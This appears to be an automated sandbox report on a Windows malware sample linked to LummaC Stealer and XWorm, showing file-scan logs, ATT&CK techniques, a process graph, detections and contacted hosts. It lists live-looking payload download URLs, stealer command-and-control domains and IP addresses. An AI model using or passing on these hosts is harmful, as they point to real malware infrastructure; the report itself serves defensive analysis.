                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZ
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVN
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVN
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeDirectory queried: C:\Users\user\Documents
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeDirectory queried: C:\Users\user\Documents
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeDirectory queried: C:\Users\user\Documents
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeDirectory queried: C:\Users\user\Documents
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZ
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZ
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVN
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVN
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAU
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAU
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBN
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBN
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeDirectory queried: C:\Users\user\Documents
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeDirectory queried: C:\Users\user\Documents
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVN
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVN
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZ
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZ
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVN
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVN
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAU
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAU
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOB
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOB
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPU
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPU
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeDirectory queried: C:\Users\user\Documents\RAYHIWGKDI
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeDirectory queried: C:\Users\user\Documents\RAYHIWGKDI
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeDirectory queried: C:\Users\user\Documents\VAMYDFPUND
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeDirectory queried: C:\Users\user\Documents\VAMYDFPUND
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeDirectory queried: number of queries: 1001
                          Source: Yara matchFile source: Process Memory Space: e44fda3216.exe PID: 1608, type: MEMORYSTR

                          Remote Access Functionality

                          barindex
                          Yara detected LummaC Stealer
                          Source: Yara matchFile source: Process Memory Space: e44fda3216.exe PID: 1608, type: MEMORYSTR
                          Yara detected XWorm
                          Source: Yara matchFile source: 20.0.NzL6O1Q.exe.720000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000014.00000000.2457478435.0000000000722000.00000002.00000001.01000000.0000001A.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: NzL6O1Q.exe PID: 2112, type: MEMORYSTR
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\NzL6O1Q[1].exe, type: DROPPED
                          Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NzL6O1Q.exe, type: DROPPED
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 5_2_0042EC48 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,5_2_0042EC48
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 5_2_0042DF51 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::GetInternalContext,5_2_0042DF51

                          Mitre Att&ck Matrix

                          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                          Gather Victim Identity InformationAcquire InfrastructureValid Accounts231
                          Windows Management Instrumentation                          		1
                          DLL Side-Loading                          		1
                          DLL Side-Loading                          		1
                          Disable or Modify Tools                          		2
                          OS Credential Dumping                          		1
                          System Time Discovery                          		Remote Services11
                          Archive Collected Data                          		1
                          Ingress Tool Transfer                          		Exfiltration Over Other Network MediumAbuse Accessibility Features
                          CredentialsDomainsDefault Accounts1
                          Native API                          		12
                          Windows Service                          		12
                          Windows Service                          		111
                          Deobfuscate/Decode Files or Information                          		LSASS Memory22
                          File and Directory Discovery                          		Remote Desktop Protocol31
                          Data from Local System                          		1
                          Encrypted Channel                          		Exfiltration Over BluetoothNetwork Denial of Service
                          Email AddressesDNS ServerDomain Accounts2
                          Command and Scripting Interpreter                          		12
                          Scheduled Task/Job                          		112
                          Process Injection                          		4
                          Obfuscated Files or Information                          		Security Account Manager356
                          System Information Discovery                          		SMB/Windows Admin SharesData from Network Shared Drive1
                          Application Layer Protocol                          		Automated ExfiltrationData Encrypted for Impact
                          Employee NamesVirtual Private ServerLocal Accounts12
                          Scheduled Task/Job                          		121
                          Registry Run Keys / Startup Folder                          		12
                          Scheduled Task/Job                          		24
                          Software Packing                          		NTDS1181
                          Security Software Discovery                          		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                          Gather Victim Network InformationServerCloud Accounts1
                          Service Execution                          		Network Logon Script121
                          Registry Run Keys / Startup Folder                          		1
                          Timestomp                          		LSA Secrets2
                          Process Discovery                          		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                          Domain PropertiesBotnetReplication Through Removable Media2
                          PowerShell                          		RC ScriptsRC Scripts1
                          DLL Side-Loading                          		Cached Domain Credentials581
                          Virtualization/Sandbox Evasion                          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items21
                          Masquerading                          		DCSync1
                          Application Window Discovery                          		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job581
                          Virtualization/Sandbox Evasion                          		Proc Filesystem2
                          System Owner/User Discovery                          		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt112
                          Process Injection                          		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                          Behavior Graph

                          Hide Legend

                          Legend:

                          • Process
                          • Signature
                          • Created File
                          • DNS/IP Info
                          • Is Dropped
                          • Is Windows Process
                          • Number of created Registry Values
                          • Number of created Files
                          • Visual Basic
                          • Delphi
                          • Java
                          • .Net C# or VB.NET
                          • C, C++ or other language
                          • Is malicious
                          • Internet
                          behaviorgraph top1 signatures2 2 Behavior Graph ID: 1585651 Sample: file.exe Startdate: 07/01/2025 Architecture: WINDOWS Score: 100 157 Found malware configuration 2->157 159 Malicious sample detected (through community Yara rule) 2->159 161 Antivirus detection for URL or domain 2->161 163 25 other signatures 2->163 13 skotes.exe 38 2->13         started        18 file.exe 5 2->18         started        20 yklcfqtilcgt.exe 2->20         started        22 6 other processes 2->22 process3 dnsIp4 147 185.215.113.43 WHOLESALECONNECTIONSNL Portugal 13->147 149 185.215.113.16 WHOLESALECONNECTIONSNL Portugal 13->149 151 31.41.244.11 AEROEXPRESS-ASRU Russian Federation 13->151 117 C:\Users\user\AppData\...\bed2608720.exe, PE32 13->117 dropped 119 C:\Users\user\AppData\...\718e743381.exe, PE32 13->119 dropped 121 C:\Users\user\AppData\...\739ad26354.exe, PE32 13->121 dropped 131 13 other malicious files 13->131 dropped 195 Hides threads from debuggers 13->195 197 Tries to detect sandboxes / dynamic malware analysis system (registry check) 13->197 199 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 13->199 24 db3cab6cee.exe 13->24         started        28 e44fda3216.exe 13->28         started        31 zjFtdxQ.exe 13->31         started        39 2 other processes 13->39 123 C:\Users\user\AppData\Local\...\skotes.exe, PE32 18->123 dropped 125 C:\Users\user\...\skotes.exe:Zone.Identifier, ASCII 18->125 dropped 201 Detected unpacking (changes PE section rights) 18->201 203 Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors) 18->203 205 Tries to evade debugger and weak emulator (self modifying code) 18->205 207 Tries to detect virtualization through RDTSC time measurements 18->207 33 skotes.exe 18->33         started        127 C:\Windows\Temp\aodefromlpug.sys, PE32+ 20->127 dropped 209 Multi AV Scanner detection for dropped file 20->209 211 Modifies the context of a thread in another process (thread injection) 20->211 213 Sample is not signed and drops a device driver 20->213 35 svchost.exe 20->35         started        41 5 other processes 20->41 153 23.56.254.164 GPRS-ASZAINKW United States 22->153 155 127.0.0.1 unknown unknown 22->155 129 C:\ProgramData\...\yklcfqtilcgt.exe, PE32+ 22->129 dropped 215 Uses powercfg.exe to modify the power settings 22->215 217 Modifies power options to not sleep / hibernate 22->217 37 powercfg.exe 22->37         started        43 7 other processes 22->43 file5 signatures6 process7 dnsIp8 93 C:\Users\user\AppData\Local\...\python311.dll, PE32+ 24->93 dropped 95 C:\Users\user\AppData\Local\...\python3.dll, PE32+ 24->95 dropped 97 C:\Users\user\AppData\Local\...\select.pyd, PE32+ 24->97 dropped 107 271 other files (260 malicious) 24->107 dropped 165 Multi AV Scanner detection for dropped file 24->165 167 Found pyInstaller with non standard icon 24->167 137 104.21.36.11 CLOUDFLARENETUS United States 28->137 169 Antivirus detection for dropped file 28->169 171 Detected unpacking (changes PE section rights) 28->171 173 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 28->173 185 7 other signatures 28->185 99 C:\Users\user\AppData\Local\...\zjFtdxQ.tmp, PE32 31->99 dropped 45 zjFtdxQ.tmp 31->45         started        175 Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors) 33->175 187 2 other signatures 33->187 139 192.248.189.11 AS-CHOOPAUS France 35->139 177 Query firmware table information (likely to detect VMs) 35->177 179 Found strings related to Crypto-Mining 35->179 181 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 35->181 48 conhost.exe 37->48         started        141 172.217.18.14 GOOGLEUS United States 39->141 143 140.82.121.4 GITHUBUS United States 39->143 145 2 other IPs or domains 39->145 101 C:\Users\user\AppData\Roaming101zL6O1Q.exe, PE32 39->101 dropped 103 C:\Users\user\AppData\Roaming\...103zL6O1Q.exe, PE32 39->103 dropped 105 C:\Users\user\AppData\Roaming\...le.exe, PE32+ 39->105 dropped 183 Machine Learning detection for dropped file 39->183 189 4 other signatures 39->189 50 Ele.exe 39->50         started        53 schtasks.exe 39->53         started        55 cmstp.exe 7 7 39->55         started        61 4 other processes 41->61 57 conhost.exe 43->57         started        59 conhost.exe 43->59         started        63 5 other processes 43->63 file9 signatures10 process11 dnsIp12 109 C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+ 45->109 dropped 111 C:\Users\user\AppData\Local\...\_isdecmp.dll, PE32 45->111 dropped 113 C:\Users\user\AppData\Local\...\_shfoldr.dll, PE32 45->113 dropped 65 zjFtdxQ.exe 45->65         started        133 185.157.162.216 OBE-EUROPEObenetworkEuropeSE Sweden 50->133 135 66.63.187.122 ASN-QUADRANET-GLOBALUS United States 50->135 115 C:\Users\user\AppData\Local\Temp\pcqxl.exe, PE32+ 50->115 dropped 68 conhost.exe 53->68         started        file13 process14 file15 83 C:\Users\user\AppData\Local\...\zjFtdxQ.tmp, PE32 65->83 dropped 70 zjFtdxQ.tmp 65->70         started        process16 file17 85 C:\Users\user\AppData\Roaming\is-VSE52.tmp, PE32+ 70->85 dropped 87 C:\Users\user\AppData\...\9rpcss_1.drv (copy), PE32+ 70->87 dropped 89 C:\Users\user\AppData\...\unins000.exe (copy), PE32 70->89 dropped 91 4 other files (3 malicious) 70->91 dropped 73 regsvr32.exe 70->73         started        process18 process19 75 regsvr32.exe 73->75         started        signatures20 191 Suspicious powershell command line found 75->191 78 powershell.exe 75->78         started        process21 signatures22 193 Loading BitLocker PowerShell Module 78->193 81 conhost.exe 78->81         started        process23

                          Screenshots

                          Thumbnails

                          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                          windows-stand

                          Antivirus, Machine Learning and Genetic Malware Detection

                          Initial Sample

                          SourceDetectionScannerLabelLink
                          file.exe58%ReversingLabsWin32.Infostealer.Tinba
                          file.exe100%AviraTR/Crypt.TPM.Gen
                          file.exe100%Joe Sandbox ML

                          Dropped Files

                          SourceDetectionScannerLabelLink
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe100%AviraTR/Crypt.TPM.Gen
                          C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exe100%AviraTR/Crypt.TPM.Gen
                          C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exe100%AviraTR/Dropper.Gen2
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\NzL6O1Q[1].exe100%AviraTR/Dropper.Gen2
                          C:\Users\user\AppData\Local\Temp\1034108001\718e743381.exe100%AviraHEUR/AGEN.1320706
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[2].exe100%AviraTR/Crypt.TPM.Gen
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe100%AviraHEUR/AGEN.1320706
                          C:\Users\user\AppData\Local\Temp\1034107001\739ad26354.exe100%AviraTR/Crypt.TPM.Gen
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\9LbUK15[1].exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\NzL6O1Q[1].exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Temp\1034108001\718e743381.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[2].exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Temp\1034107001\739ad26354.exe100%Joe Sandbox ML
                          C:\ProgramData\vhsqbqlujrwy\yklcfqtilcgt.exe78%ReversingLabsWin64.Trojan.MintZard
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\9LbUK15[1].exe16%ReversingLabs
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe13%ReversingLabsWin32.Ransomware.TelegramRAT
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\zjFtdxQ[1].exe3%ReversingLabs
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\NzL6O1Q[1].exe53%ReversingLabsByteCode-MSIL.Trojan.Zilla
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[1].exe37%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe16%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\1033956001\zjFtdxQ.exe3%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exe53%ReversingLabsByteCode-MSIL.Trojan.Zilla
                          C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe13%ReversingLabsWin32.Ransomware.TelegramRAT
                          C:\Users\user\AppData\Local\Temp\1034109001\bed2608720.exe37%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Cipher\AES.pyi0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Cipher\ARC2.pyi0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Cipher\ARC4.pyi0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Cipher\Blowfish.pyi0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Cipher\CAST.pyi0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Cipher\ChaCha20.pyi0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Cipher\ChaCha20_Poly1305.pyi0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Cipher\DES.pyi0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Cipher\DES3.pyi0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Cipher\PKCS1_OAEP.pyi0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Cipher\PKCS1_v1_5.pyi0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Cipher\Salsa20.pyi0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Cipher\_ARC4.pyd0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Cipher\_EKSBlowfish.pyi0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Cipher\_chacha20.pyd0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Cipher\_mode_cbc.pyi0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Cipher\_mode_ccm.pyi0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Cipher\_mode_cfb.pyi0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Cipher\_mode_ctr.pyi0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Cipher\_mode_eax.pyi0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Cipher\_mode_ecb.pyi0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Cipher\_mode_gcm.pyi0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Cipher\_mode_ocb.pyi0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Cipher\_mode_ofb.pyi0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Cipher\_mode_openpgp.pyi0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Hash\KMAC128.pyi0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Hash\KMAC256.pyi0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Hash\MD2.pyi0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Hash\MD4.pyi0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Hash\MD5.pyi0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Hash\Poly1305.pyi0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Hash\RIPEMD160.pyi0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Hash\SHA.pyi0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Hash\SHA1.pyi0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Hash\SHA224.pyi0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Hash\SHA256.pyi0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Hash\SHA384.pyi0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Hash\SHA3_224.pyi0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Hash\SHA3_256.pyi0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Hash\SHA3_384.pyi0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Hash\SHA3_512.pyi0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Hash\SHA512.pyi0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Hash\SHAKE128.pyi0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Hash\SHAKE256.pyi0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Hash\TupleHash128.pyi0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Hash\TupleHash256.pyi0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Hash\TurboSHAKE128.pyi0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Hash\TurboSHAKE256.pyi0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Hash\_BLAKE2b.pyd0%ReversingLabs

                          Unpacked PE Files

                          No Antivirus matches

                          Domains

                          No Antivirus matches

                          URLs

                          SourceDetectionScannerLabelLink
                          http://185.215.113.16/off/def.exea0%Avira URL Cloudsafe
                          http://185.215.113.16/off/def.exeEM0%Avira URL Cloudsafe
                          https://zealous-roentgen.66-63-187-122.ple0%Avira URL Cloudsafe
                          letterdrive.shop0%Avira URL Cloudsafe
                          https://letterdrive.shop/apibuR0%Avira URL Cloudsafe
                          https://letterdrive.shop:443/apiQh0%Avira URL Cloudsafe
                          crowdwarek.shop0%Avira URL Cloudsafe
                          robinsharez.shop0%Avira URL Cloudsafe
                          https://letterdrive.shop/Y0%Avira URL Cloudsafe
                          https://letterdrive.shop/api1Sw0%Avira URL Cloudsafe
                          https://letterdrive.shop:443/api0%Avira URL Cloudsafe
                          https://zealous-roentgen.66-63-187-122.plesk.page/66/api/endpoint.phpll100%Avira URL Cloudphishing
                          femalsabler.shop0%Avira URL Cloudsafe
                          https://letterdrive.shop/mfilJ0%Avira URL Cloudsafe
                          https://letterdrive.shop/apiMSwhVz0%Avira URL Cloudsafe
                          https://zealous-roentgen.66-63-187-122.plesk.page/66/P.txtP100%Avira URL Cloudphishing
                          https://zealous-roentgen.66-63-187-122.plesk.page/66/api/endpoint.phpvohvtbtkkqqpcgvy100%Avira URL Cloudphishing
                          https://letterdrive.shop/apibu0%Avira URL Cloudsafe
                          apporholis.shop0%Avira URL Cloudsafe
                          soundtappysk.shop0%Avira URL Cloudsafe
                          https://zealous-roentgen.66-63-187-122.plesk.page/66/api/endpoint.php--cinit-version=3.4.1--nicehash100%Avira URL Cloudphishing
                          http://185.215.113.16/off/def.exe;100%Avira URL Cloudmalware
                          http://185.215.113.16/off/def.exeEx0%Avira URL Cloudsafe
                          chipdonkeruz.shop0%Avira URL Cloudsafe
                          https://zealous-roentgen.66-63-187-122.plesk.p0%Avira URL Cloudsafe
                          https://zealous-roentgen.66-63-187-122.plesk.page/66/api/endpoint.php6100%Avira URL Cloudphishing
                          http://zealous-roentgen.66-63-187-122.plesk.page100%Avira URL Cloudphishing
                          https://zealous-roentgen.66-63-187-122.plesk.page/98.exe100%Avira URL Cloudphishing
                          versersleep.shop0%Avira URL Cloudsafe
                          https://letterdrive.shop/apis0%Avira URL Cloudsafe
                          http://go.mic50%Avira URL Cloudsafe
                          https://letterdrive.shop/apip0%Avira URL Cloudsafe
                          https://letterdrive.shop/0%Avira URL Cloudsafe
                          https://letterdrive.shop/15200%Avira URL Cloudsafe
                          https://letterdrive.shop/api~0%Avira URL Cloudsafe
                          https://letterdrive.shop/apiob0%Avira URL Cloudsafe
                          http://www.w3.0%Avira URL Cloudsafe
                          http://svn.red-bean.com/bob/macholib/trunk/macholib/0%Avira URL Cloudsafe
                          https://zealous-roentgen.66-63-187-122.plesk.page/66/P.txtTaskmgr.exe100%Avira URL Cloudphishing
                          https://zealous-roentgen.66-63-187-122.plesk.page/66/P.txt100%Avira URL Cloudphishing
                          https://letterdrive.shop/api$0%Avira URL Cloudsafe
                          https://letterdrive.shop/apieDU0%Avira URL Cloudsafe
                          https://letterdrive.shop/api0%Avira URL Cloudsafe
                          https://letterdrive.shop/K00%Avira URL Cloudsafe

                          Domains and IPs

                          Contacted Domains

                          No contacted domains info

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          robinsharez.shoptrue
                          • Avira URL Cloud: safe
                          		unknown
                          crowdwarek.shoptrue
                          • Avira URL Cloud: safe
                          		unknown
                          letterdrive.shoptrue
                          • Avira URL Cloud: safe
                          		unknown
                          femalsabler.shoptrue
                          • Avira URL Cloud: safe
                          		unknown
                          soundtappysk.shoptrue
                          • Avira URL Cloud: safe
                          		unknown
                          apporholis.shoptrue
                          • Avira URL Cloud: safe
                          		unknown
                          chipdonkeruz.shoptrue
                          • Avira URL Cloud: safe
                          		unknown
                          versersleep.shoptrue
                          • Avira URL Cloud: safe
                          		unknown

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          http://185.215.113.16/off/def.exeEMe44fda3216.exe, 0000000B.00000003.2765743260.0000000000618000.00000004.00000020.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2625395130.0000000000613000.00000004.00000020.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000002.3295906531.0000000000607000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://185.215.113.16/off/def.exeae44fda3216.exe, 0000000B.00000003.2625395130.0000000000613000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://duckduckgo.com/chrome_newtabe44fda3216.exe, 0000000B.00000003.2387503402.000000000538C000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2387614390.000000000538C000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2387430064.000000000538E000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://duckduckgo.com/ac/?q=e44fda3216.exe, 0000000B.00000003.2387503402.000000000538C000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2387614390.000000000538C000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2387430064.000000000538E000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
